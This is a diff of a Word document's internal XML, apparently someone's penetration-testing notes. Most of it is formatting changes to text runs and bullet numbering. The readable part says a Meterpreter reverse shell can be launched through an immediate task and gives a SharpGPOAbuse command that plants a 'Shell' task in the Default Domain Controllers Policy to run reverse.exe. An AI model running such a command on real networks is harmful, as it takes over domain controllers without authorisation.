         </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -847,167 +419,59 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>You</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can upload an immediate task </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>invokes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Meterpreter</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Revshell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>./SharpGPOAbuse.exe --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AddComputerTask</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>TaskName</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "Shell" --Author OFFICE\Administrator --Command "cmd.exe" --Arguments "/c C:\Temp\reverse.exe" --</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPOName</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "Default Domain Controllers Policy"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:left="0"/>
+        <w:t>You can upload an immediate task that invokes a Meterpreter Revshell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>./SharpGPOAbuse.exe --AddComputerTask --TaskName "Shell" --Author OFFICE\Administrator --Command "cmd.exe" --Arguments "/c C:\Temp\reverse.exe" --GPOName "Default Domain Controllers Policy"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
+      <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
@@ -1017,11 +481,12 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="6">
-    <w:nsid w:val="c581995"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0C581995"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2F4CFF94"/>
+    <w:lvl w:ilvl="0" w:tplc="9BC43B10">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1030,10 +495,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="5ADAC420">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1042,10 +507,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="BC6273E6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1054,10 +519,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="D40A3528">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1066,10 +531,10 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="8B76B82E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1078,10 +543,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4BFEDA00">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1090,10 +555,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="BC4C57D4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1102,10 +567,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="B270EAEC">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1114,10 +579,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0A3871B6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1126,14 +591,15 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="5">
-    <w:nsid w:val="41a808a9"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="177FDF6A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7366920A"/>
+    <w:lvl w:ilvl="0" w:tplc="08FAA53A">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1142,10 +608,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="27F4080E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1154,10 +620,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="83A6ECB4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1166,10 +632,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="54CEB426">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1178,10 +644,10 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="8BE44242">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1190,10 +656,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="57249452">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1202,10 +668,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="77C43FB8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1214,10 +680,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="C88669BE">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1226,10 +692,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="16F03532">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1238,14 +704,15 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="4">
-    <w:nsid w:val="177fdf6a"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="34DF7AF4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="87A2D882"/>
+    <w:lvl w:ilvl="0" w:tplc="782EEA86">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1254,10 +721,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="CA86F68A">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1266,10 +733,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="D69813D2">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1278,10 +745,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="C3260C4C">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1290,10 +757,10 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="2CBEC164">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1302,10 +769,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="986031A8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1314,10 +781,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="48A8D764">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1326,10 +793,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="AD2CEBA6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1338,10 +805,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="C1FA1AE4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1350,14 +817,15 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="3">
-    <w:nsid w:val="7622a07e"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="41A808A9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="718ECFAE"/>
+    <w:lvl w:ilvl="0" w:tplc="F2D45C92">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1366,10 +834,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="AF62B422">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1378,10 +846,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="22CC4D7E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1390,10 +858,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="63760B3A">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1402,10 +870,10 @@
